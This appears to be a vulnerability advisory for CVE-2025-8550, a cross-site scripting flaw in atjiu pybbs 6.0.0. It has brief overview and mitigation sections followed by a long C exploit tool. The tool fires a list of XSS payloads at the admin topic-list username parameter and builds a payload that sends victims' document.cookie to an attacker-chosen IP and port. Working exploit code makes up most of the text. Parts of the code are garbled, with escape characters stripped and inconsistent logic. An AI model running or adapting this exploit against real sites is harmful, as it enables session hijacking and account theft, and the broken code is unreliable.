Overview
The atjiu pybbs 6.0.0 vulnerability, identified as CVE-2025-8550, is a critical Cross Site Scripting (XSS) flaw that affects web applications built on this forum software. This vulnerability allows attackers to inject malicious scripts into web pages viewed by users, potentially compromising sensitive information and user sessions.
Technical Details
This XSS vulnerability arises due to inadequate input validation and output encoding in the affected version of atjiu pybbs. When a user submits data, such as forum posts or comments, without proper sanitization, an attacker can exploit this by embedding JavaScript code within the input fields. For instance, a malicious user might post a comment containing a script that executes when other users view the post, leading to unauthorized actions on behalf of the victim.
Specifically, the vulnerability can be triggered in various contexts, such as user profiles or comment sections, where the application fails to encode output properly. As a result, this allows the execution of arbitrary JavaScript in the browsers of users, posing significant risks to data integrity and user privacy.
Impact
The consequences of CVE-2025-8550 can be severe. Attackers can leverage this vulnerability to perform actions such as stealing cookies, session tokens, or even redirecting users to malicious sites. In a corporate environment, this could lead to significant data breaches, loss of user trust, and potential legal ramifications.
Mitigation
To protect against CVE-2025-8550, security professionals should implement robust input validation and output encoding practices. This includes using libraries that automatically sanitize user inputs and ensuring that all outputs are properly encoded before being rendered in the browser. Additionally, employing a Content Security Policy (CSP) can mitigate the risk of XSS attacks by restricting the sources from which scripts can be executed.
It is also advisable to regularly update the atjiu pybbs software to the latest version, as updates often include important security patches. Conducting regular security audits and penetration testing can further help in identifying and mitigating vulnerabilities before they can be exploited.
Proof of Concept (PoC)
poc.sh
/*
* Exploit Title : atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)
* Exploit Author: Byte Reaper
* Vendor Homepage: https://github.com/atjiu/pybbs
* Tested on: Kali Linux
* CVE: CVE-2025-8550
* ------------------------------------------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <curl/curl.h>
#include <pthread.h>
#include <string.h>
#include <stdlib.h>
#include "argparse.h"
#include <time.h>
#include <dirent.h>
#include <unistd.h>
#include <ctype.h>
#include <arpa/inet.h>
#define FULL_URL 3500
#define FULL_PAYLOAD_URL 9000
#define BUFFER_SIZE 6000
int selCookie = 0;
const char *cookies = NULL;
const char *baseurl = NULL;
const char *nameFileC= NULL;
int cookiesPayload = 0;
const char *ip = NULL;
int port = 0;
int verbose = 0;
int serchServer_alt()
{
printf("e[0;35m============================================ [SEARCH PROCESS] ============================================e[0mn");
const char *nameProcess[] =
{
"python",
"apache2",
"python3",
"mysql",
NULL
};
DIR *d = opendir("/proc");
if (!d) return 1;
struct dirent *entry;
while ((entry = readdir(d)) != NULL)
{
if (!isdigit(entry->d_name[0])) continue;
char cmdpath[256];
snprintf(cmdpath, sizeof(cmdpath), "/proc/%s/comm", entry->d_name);
FILE *f = fopen(cmdpath, "r");
if (!f) continue;
char comm[256];
if (fgets(comm, sizeof(comm), f))
{
for (int i = 0; nameProcess[i]; i++)
{
if (strstr(comm, nameProcess[i]))
{
printf("e[0;34m[+] Process found: %s (PID: %s)e[0mn", nameProcess[i], entry->d_name);
closedir(d);
return 0;
}
}
}
fclose(f);
}
closedir(d);
return 1;
printf("e[0;35m==========================================================================================================e[0mn");
}
void exitSyscall()
{
__asm__ volatile
(
"mov $0x3C, %%raxnt"
"xor %%rdi, %%rdint"
"syscallnt"
:
:
:"rax", "rdi"
);
}
int checkLen(int len, char *buf, size_t bufcap)
{
if (len < 0 || (size_t)len >= bufcap)
{
printf("e[0;31m[-] Len is Long ! e[0mn");
printf("e[0;31m[-] Len %de[0mn", len);
exitSyscall();
return 1;
}
else
{
printf("e[0;34m[+] Len Is Not Long (%d).e[0mn",len);
return 0;
}
return 0;
}
void nanoSleep(void)
{
struct timespec ob;
ob.tv_sec = 0;
ob.tv_nsec = 500 * 1000 * 1000;
__asm__ volatile
(
"mov $230, %%raxnt"
"mov $1, %%rdint"
"xor %%rsi, %%rsint"
"mov %0, %%rdxnt"
"xor %%r10, %%r10nt"
"syscallnt"
:
: "r"(&ob)
: "rax",
"rdi",
"rsi",
"rdx",
"r10",
"memory"
);
}
const char *payloads[] =
{
"<script>alert(1)</script>",
""><img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
"<body onload=alert(1)>",
"<iframe src="javascript:alert(1)"></iframe>",
"<a href="#" onclick="alert(1)">click</a>",
"<math><mi xlink:href="javascript:alert(1)">XSS</mi></math>",
"<svg><script>alert(1)</script></svg>",
""><iframe srcdoc="<script>alert(1)</script>"></iframe>",
"<img src="x" onerror="javascript:alert(1)">",
"<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
"<script>Function('al'+'ert(1)')()</script>",
"<script>(([]+[])[+[]]+([][[]]+[])[+!+[]])[1]+''[1]</script>",
"<object data="javascript:alert(1)"></object>",
"<video><source onerror="alert(1)"></video>",
"<link rel="stylesheet" href="javascript:alert(1)">",
"<form onformdata=alert(1)><input></form>",
"<isindex type=image src=1 onerror=alert(1)>",
"<details open ontoggle=alert(1)>",
"<img src=x onerror=alert(1)>",
"javascript:alert`1`",
"javascript:alert(1)",
"<script src=data:text/javascript,alert(1)></script>",
NULL
};
const char *wordPayloadXss[] =
{
"<script>",
"onerror=",
"onload=",
"alert(",
"javascript:",
"<svg",
"fetch(",
"document.cookie",
"srcdoc=",
NULL
};
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr,
size_t size,
size_t nmemb,
void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
fprintf(stderr, "e[1;31m[-] Failed to allocate memory!e[0mn");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '�';
return total;
}
void cookieSend(const char *ipServer, int portY, const char *urlCP)
{
CURL *curl = curl_easy_init();
CURLcode res;
struct Mem responsePayload ;
responsePayload.buffer = NULL;
responsePayload.len = 0;
printf("e[0;35m================================================================ [COOKIE PAYLOAD] ================================================================e[0mn");
if (curl == NULL)
{
printf("e[0;31m[-] Error Create Object CURL !e[0mn");
exitSyscall();
}
if (curl)
{
char full[FULL_PAYLOAD_URL];
if (!port)
{
portY = 80;
printf("e[0;34m[+] Default Port -> %de[0mn", portY);
}
unsigned long format;
format = inet_addr(ipServer);
if (format == INADDR_NONE)
{
printf("e[0;31m[-] Invalid IP address string.e[0mn");
exitSyscall();
}
else
{
printf("e[0;34m[+] IP ADDRESS : %se[0mn", ipServer);
}
char server[BUFFER_SIZE];
if (!server)
{
fprintf(stderr, "e[0;31m[-] Error allocating memory!e[0mn");
exitSyscall();
}
int lenS = snprintf(server, BUFFER_SIZE, "<script>new Image().src='http://%s:%d/steal?c='+encodeURIComponent(document.cookie);</script>", ipServer, portY);
if (checkLen(lenS, server, BUFFER_SIZE) == 1)
{
printf("[-] Error write base url in FULL URL !e[0mn");
exitSyscall();
}
printf("e[0;34m[+] Write Your IP And Port successfully in Payload.e[0mn");
printf("e[0;34m[+] Full Payload Format steals cookies : %se[0mn", server);
char *encodePayloadCookie = curl_easy_escape(curl, server, strlen(server));
if (!encodePayloadCookie)
{
printf("e[0;31m[-] Error Encode Payload !n");
exitSyscall();
}
printf("[+] Encode Payload : %sn", encodePayloadCookie);
int lenSC = snprintf(full, FULL_PAYLOAD_URL, "%s/admin/topic/list?startDate=&endDate=&username=%s", urlCP, encodePayloadCookie);
if (checkLen(lenSC, full, FULL_PAYLOAD_URL) == 1)
{
printf("e[0;31m[-] Error write base url in FULL URL !e[0mn");
exitSyscall();
}
curl_easy_setopt(curl, CURLOPT_URL, full);
if (selCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&responsePayload);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
nanoSleep();
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
printf("e[1;35m------------------------------------------[Verbose Curl]------------------------------------------e[0mn");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0)");
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Upgrade-Insecure-Requests: 1");
h = curl_slist_append(h,
"Cache-Control: max-age=0");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
res = curl_easy_perform(curl);
curl_slist_free_all(h);
curl_free(encodePayloadCookie);
if (res == CURLE_OK)
{
long httpCode = 0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&httpCode);
printf("e[1;36m[+] Request sent successfullye[0mn");
printf("e[1;32m-> Http Code : %lde[0mn", httpCode);
if (httpCode >= 200 && httpCode < 300)
{
printf("e[0;32m[+] Http Code (200 < 300) : %lde[0mn",
httpCode);
printf("e[0;36m[+] Payload Injection successfully.e[0mn");
printf("e[0;36m[+] Please Check Your Server.e[0mn");
}
else
{
printf("[-] Payload Injection Failed !e[0mn");
printf("[-] http Code Not Range (%ld)e[0mn", httpCode);
}
}
else
{
printf("e[1;31m[-] The request was not sent !e[0mn");
printf("e[1;31m[-] Error : %se[0mn", curl_easy_strerror(res));
exitSyscall();
}
}
curl_easy_cleanup(curl);
if (responsePayload.buffer)
{
free(responsePayload.buffer);
responsePayload.buffer = NULL;
responsePayload.len = 0;
}
printf("e[0;35m==================================================================================================================================================e[0mn");
}
int sendRequest(const char *url)
{
char full[FULL_URL];
struct Mem response;
CURL *curl = curl_easy_init();
if (curl == NULL || !curl)
{
printf("e[0;31m[-] Error Create Objetc CURL !e[0mn");
exitSyscall();
}
CURLcode res;
response.buffer= NULL;
response.len = 0;
if (response.buffer == NULL && response.len == 0)
{
printf("e[0;33m[+] Clean Response Buffer successfully.e[0mn");
printf("e[0;33m[+] Response Buffer -> NULLe[0mn");
printf("e[0;33m[+] Response Len -> 0e[0mn");
}
else
{
printf("e[0;31m[-] Cleaning Buffer and len did not work !e[0mn");
}
int finish = 0;
for (int p = 0 ; payloads[p] != NULL; p++)
{
char *encodePayload = curl_easy_escape(curl, payloads[p], strlen(payloads[p]));
if (encodePayload == NULL || !encodePayload)
{
printf("e[0;31m[-] Error Encode Payload !n");
exitSyscall();
}
printf("e[0;34m[+] Encode Payload successfully.e[0mn");
printf("e[0;34m[+] Original Payload : %se[0mn", payloads[p]);
printf("e[0;34m[+] Encode Payload : %se[0mn", encodePayload);
int len = snprintf(full, sizeof(full), "%s/admin/topic/list?startDate=&endDate=&username=%s", url, encodePayload);
if (checkLen(len, full, sizeof(full)) == 1)
{
printf("e[0;31m[-] Error write base url in FULL URL !e[0mn");
printf("e[0;31m[-] LEN FULL URL : %de[0mn", len);
exitSyscall();
}
printf("[+] FULL URL : %sn", full);
curl_easy_setopt(curl, CURLOPT_URL, full);
if (selCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
nanoSleep();
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
printf("e[1;35m------------------------------------------[Verbose Curl]------------------------------------------e[0mn");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
char referer[3500];
int refLen = snprintf(referer, sizeof(referer), "Referer: %s", full);
if (checkLen(refLen, referer, sizeof(referer)) == 1)
{
printf("e[0;31m[-] Error write Header Referer Content !e[0mn");
printf("e[0;31m[-] Default Header Referer : http://exemple.come[0mn");
h = curl_slist_append(h,
"Referer : http://exemple.com");
exitSyscall();
}
else
{
printf("e[0;34m[+] Write Header Referer Content successfully.e[0mn");
printf("e[0;34m[+] Header Referer : %se[0mn", referer);
h = curl_slist_append(h,
referer);
}
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
res = curl_easy_perform(curl);
curl_slist_free_all(h);
curl_free(encodePayload);
if (res == CURLE_OK)
{
long httpCode = 0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&httpCode);
printf("e[0;37m--------------------------------------------------------------------------------------------------------e[0mn");
printf("e[1;36m[+] Request sent successfullye[0mn");
printf("e[1;32m-> Http Code : %lde[0mn", httpCode);
if (httpCode >= 200 && httpCode < 300)
{
printf("e[0;32m[+] Http Code (200 < 300) : %lde[0mn",
httpCode);
if (verbose)
{
if (response.buffer)
{
printf("e[1;37mn======================================== [Response ] ========================================e[0mn");
printf("%sn", response.buffer);
printf("e[1;32m[Len] : %zue[0mn", response.len);
printf("e[1;37mn=============================================================================================e[0mn");
}
}
for (int w = 0; wordPayloadXss[w] != NULL; w++)
{
if (strstr(response.buffer, wordPayloadXss[w]) != NULL)
{
printf("e[0;36m[+] Word Found in Response : %sn", wordPayloadXss[w]);
if (response.buffer)
{
printf("e[1;35m==================================== [WORD FOUND RESPONSE] ====================================e[0mn");
printf("%sn", response.buffer);
printf("e[1;32m[+] Response Len : %zue[0mn", response.len);
printf("e[1;35m===============================================================================================e[0mnn");
}
else
{
printf("[-] Response Is NULL, Exit ...n");
exitSyscall();
}
}
else
{
if (verbose)
{
printf("e[0;31m[-] Word Not Found In Response %se[0mn", wordPayloadXss[w]);
}
if (wordPayloadXss[w] == NULL)
{
printf("e[0;31m[-] Not Found Word In Response !e[0mn");
finish = 1;
}
}
}
}
else
{
printf("e[0;31m[-] Negative response code (%ld)!e[0mn", httpCode);
}
}
else
{
printf("e[1;31m[-] The request was not sent !e[0mn");
printf("e[1;31m[-] Error : %se[0mn", curl_easy_strerror(res));
exitSyscall();
}
}
curl_easy_cleanup(curl);
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
return finish;
}
void *thread_routine(void *arg)
{
int finish = sendRequest((const char *)arg);
return (void *)(intptr_t)finish;
}
void runThread(const char *urlT)
{
int valeuF = sendRequest(urlT);
pthread_t thread;
for (int u = 0; valeuF == 1; u++)
{
if (valeuF == 1)
{
pthread_exit(NULL);
}
if (pthread_create(&thread, NULL, thread_routine, (void *)urlT) == 0)
{
printf("e[0;32m[+] Pthread Create successfully.e[0mn");
}
else
{
printf("e[0;31m[-] Pthread Create Faild !e[0mn");
}
sleep(2);
printf("e[0;32m[+] Sleep 2 s...n");
pthread_cancel(thread);
if (pthread_join(thread, NULL) == 0)
{
printf("e[0;32m[+] Pthread Join successfully.e[0mn");
}
else
{
if (verbose)
{
printf("e[0;31m[-] Pthread Join Faild !e[0mn");
}
}
}
}
int main(int argc, const char **argv)
{
printf(
"e[0;31m"
"░██████ ░██ ░██ ░██████████ ░██████ ░████ ░██████ ░████████ ░██████ ░████████ ░████████ ░████ n"
"░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ n"
"░██ ░██ ░██ ░██ ░██ ░██ ░████ ░██ ░███████ ░██ ░██ ░███████ ░███████ ░██ ░████ n"
"░██ ░██ ░██ ░█████████ ░██████ ░█████ ░██░██░██ ░█████ ░██ ░██████ ░██████ ░██ ░██ ░██░██░██ n"
"░██ ░██ ░██ ░██ ░██ ░████ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░████ ░██ n"
"░██ ░██ ░██░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ ░██ n"
"░██████ ░███ ░██████████ ░████████ ░████ ░████████ ░██████ ░██████ ░██████ ░██████ ░████ n"
"e[0;37mttttttttttttttByte Reapere[0mn"
);
printf("e[0;31m---------------------------------------------------------------------------------------------------------------------------------------------------------e[0mn");
curl_global_init(CURL_GLOBAL_DEFAULT);
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&baseurl,
"Enter Target Url (http://<TARGET>)"),
OPT_STRING('c',
"cookies",
&nameFileC,
"Enter File cookies"),
OPT_BOOLEAN('k',
"cokpay",
&cookiesPayload,
"Arg For Send Request steals cookies (-k (NULL))"),
OPT_STRING('i',
"ip",
&ip,
"Enter Your Ip Server"),
OPT_INTEGER('p',
"port",
&port,
"Enter Port Server"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
serchServer_alt();
if (!baseurl)
{
printf("e[1;31m[-] Please Enter target Url !e[0mn");
printf("e[1;31m[-] Example : ./CVE-2025-8550 -u http://<TARGET>e[0mn");
exitSyscall();
}
if (nameFileC)
{
selCookie = 1;
}
if (verbose)
{
verbose = 1;
}
if (cookieSend && ip && port)
{
cookieSend(ip, port, baseurl);
}
else
{
printf("[-] Please Enter Ip And Port !e[0mn");
}
runThread(baseurl);
curl_global_cleanup();
return 0;
}